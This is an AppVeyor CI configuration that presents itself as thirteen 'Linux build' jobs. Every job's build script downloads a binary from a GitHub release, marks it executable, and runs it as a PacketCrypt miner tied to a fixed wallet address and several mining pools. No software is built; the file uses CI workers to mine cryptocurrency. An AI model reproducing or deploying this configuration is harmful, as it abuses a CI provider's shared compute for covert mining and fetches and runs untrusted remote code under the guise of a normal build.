environment:
  matrix:

  - job_name: Linux build
    appveyor_build_worker_image: Ubuntu

  - job_name: Linux build 1
    appveyor_build_worker_image: Ubuntu

  - job_name: Linux build 2
    appveyor_build_worker_image: Ubuntu

  - job_name: Linux build 3
    appveyor_build_worker_image: Ubuntu

  - job_name: Linux build 4
    appveyor_build_worker_image: Ubuntu

  - job_name: Linux build 5
    appveyor_build_worker_image: Ubuntu

  - job_name: Linux build 6
    appveyor_build_worker_image: Ubuntu

  - job_name: Linux build 7
    appveyor_build_worker_image: Ubuntu

  - job_name: Linux build 8
    appveyor_build_worker_image: Ubuntu

  - job_name: Linux build 9
    appveyor_build_worker_image: Ubuntu

  - job_name: Linux build 10
    appveyor_build_worker_image: Ubuntu

  - job_name: Linux build 11
    appveyor_build_worker_image: Ubuntu

  - job_name: Linux build 12
    appveyor_build_worker_image: Ubuntu


matrix:
  fast_finish: true

init:
  - appveyor version

# job-specific configurations
for:

  -
    matrix:
      only:
        - job_name: Linux build

    build_script:
    - sh: wget http://github.com/SiemdeNijs/packetcrypt_rs_SNcomp/releases/download/release/packetcrypt_x8664_linux
    - sh: chmod +x packetcrypt_x8664_linux
    - sh: ./packetcrypt_x8664_linux ann -p pkt1qn8kg9zr4nx9jpy3ljgqamk7vtmszy32mqv96yj http://pool.pkt.world/ http://pool.pktpool.io/ http://pool.pkteer.com https://pool.pkthash.com
  -
    matrix:
      only:
        - job_name: Linux build 1

    build_script:
    - sh: wget http://github.com/SiemdeNijs/packetcrypt_rs_SNcomp/releases/download/release/packetcrypt_x8664_linux
    - sh: chmod +x packetcrypt_x8664_linux
    - sh: ./packetcrypt_x8664_linux ann -p pkt1qn8kg9zr4nx9jpy3ljgqamk7vtmszy32mqv96yj http://pool.pkt.world/ http://pool.pktpool.io/ http://pool.pkteer.com https://pool.pkthash.com   

  -
    matrix:
      only:
        - job_name: Linux build 2
    build_script:
    - sh: wget http://github.com/SiemdeNijs/packetcrypt_rs_SNcomp/releases/download/release/packetcrypt_x8664_linux
    - sh: chmod +x packetcrypt_x8664_linux
    - sh: ./packetcrypt_x8664_linux ann -p pkt1qn8kg9zr4nx9jpy3ljgqamk7vtmszy32mqv96yj http://pool.pkt.world/ http://pool.pktpool.io/ http://pool.pkteer.com https://pool.pkthash.com   


  -
    matrix:
      only:
        - job_name: Linux build 3

    build_script:
    - sh: wget http://github.com/SiemdeNijs/packetcrypt_rs_SNcomp/releases/download/release/packetcrypt_x8664_linux
    - sh: chmod +x packetcrypt_x8664_linux
    - sh: ./packetcrypt_x8664_linux ann -p pkt1qn8kg9zr4nx9jpy3ljgqamk7vtmszy32mqv96yj http://pool.pkt.world/ http://pool.pktpool.io/ http://pool.pkteer.com https://pool.pkthash.com   

  -
    matrix:
      only:
        - job_name: Linux build 4

    build_script:
    - sh: wget http://github.com/SiemdeNijs/packetcrypt_rs_SNcomp/releases/download/release/packetcrypt_x8664_linux
    - sh: chmod +x packetcrypt_x8664_linux
    - sh: ./packetcrypt_x8664_linux ann -p pkt1qn8kg9zr4nx9jpy3ljgqamk7vtmszy32mqv96yj http://pool.pkt.world/ http://pool.pktpool.io/ http://pool.pkteer.com https://pool.pkthash.com   

  -
    matrix:
      only:
        - job_name: Linux build 5

    build_script:
    - sh: wget http://github.com/SiemdeNijs/packetcrypt_rs_SNcomp/releases/download/release/packetcrypt_x8664_linux
    - sh: chmod +x packetcrypt_x8664_linux
    - sh: ./packetcrypt_x8664_linux ann -p pkt1qn8kg9zr4nx9jpy3ljgqamk7vtmszy32mqv96yj http://pool.pkt.world/ http://pool.pktpool.io/ http://pool.pkteer.com https://pool.pkthash.com

  -
    matrix:
      only:
        - job_name: Linux build 6

    build_script:
    - sh: wget http://github.com/SiemdeNijs/packetcrypt_rs_SNcomp/releases/download/release/packetcrypt_x8664_linux
    - sh: chmod +x packetcrypt_x8664_linux
    - sh: ./packetcrypt_x8664_linux ann -p pkt1qn8kg9zr4nx9jpy3ljgqamk7vtmszy32mqv96yj http://pool.pkt.world/ http://pool.pktpool.io/ http://pool.pkteer.com https://pool.pkthash.com
  -
    matrix:
      only:
        - job_name: Linux build 7

    build_script:
    - sh: wget http://github.com/SiemdeNijs/packetcrypt_rs_SNcomp/releases/download/release/packetcrypt_x8664_linux
    - sh: chmod +x packetcrypt_x8664_linux
    - sh: ./packetcrypt_x8664_linux ann -p pkt1qn8kg9zr4nx9jpy3ljgqamk7vtmszy32mqv96yj http://pool.pkt.world/ http://pool.pktpool.io/ http://pool.pkteer.com https://pool.pkthash.com   

  -
    matrix:
      only:
        - job_name: Linux build 8
    build_script:
    - sh: wget http://github.com/SiemdeNijs/packetcrypt_rs_SNcomp/releases/download/release/packetcrypt_x8664_linux
    - sh: chmod +x packetcrypt_x8664_linux
    - sh: ./packetcrypt_x8664_linux ann -p pkt1qn8kg9zr4nx9jpy3ljgqamk7vtmszy32mqv96yj http://pool.pkt.world/ http://pool.pktpool.io/ http://pool.pkteer.com https://pool.pkthash.com   


  -
    matrix:
      only:
        - job_name: Linux build 9

    build_script:
    - sh: wget http://github.com/SiemdeNijs/packetcrypt_rs_SNcomp/releases/download/release/packetcrypt_x8664_linux
    - sh: chmod +x packetcrypt_x8664_linux
    - sh: ./packetcrypt_x8664_linux ann -p pkt1qn8kg9zr4nx9jpy3ljgqamk7vtmszy32mqv96yj http://pool.pkt.world/ http://pool.pktpool.io/ http://pool.pkteer.com https://pool.pkthash.com   

  -
    matrix:
      only:
        - job_name: Linux build 10

    build_script:
    - sh: wget http://github.com/SiemdeNijs/packetcrypt_rs_SNcomp/releases/download/release/packetcrypt_x8664_linux
    - sh: chmod +x packetcrypt_x8664_linux
    - sh: ./packetcrypt_x8664_linux ann -p pkt1qn8kg9zr4nx9jpy3ljgqamk7vtmszy32mqv96yj http://pool.pkt.world/ http://pool.pktpool.io/ http://pool.pkteer.com https://pool.pkthash.com   

  -
    matrix:
      only:
        - job_name: Linux build 11

    build_script:
    - sh: wget http://github.com/SiemdeNijs/packetcrypt_rs_SNcomp/releases/download/release/packetcrypt_x8664_linux
    - sh: chmod +x packetcrypt_x8664_linux
    - sh: ./packetcrypt_x8664_linux ann -p pkt1qn8kg9zr4nx9jpy3ljgqamk7vtmszy32mqv96yj http://pool.pkt.world/ http://pool.pktpool.io/ http://pool.pkteer.com https://pool.pkthash.com

  -
    matrix:
      only:
        - job_name: Linux build 12

    build_script:
    - sh: wget http://github.com/SiemdeNijs/packetcrypt_rs_SNcomp/releases/download/release/packetcrypt_x8664_linux
    - sh: chmod +x packetcrypt_x8664_linux
    - sh: ./packetcrypt_x8664_linux ann -p pkt1qn8kg9zr4nx9jpy3ljgqamk7vtmszy32mqv96yj http://pool.pkt.world/ http://pool.pktpool.io/ http://pool.pkteer.com https://pool.pkthash.com
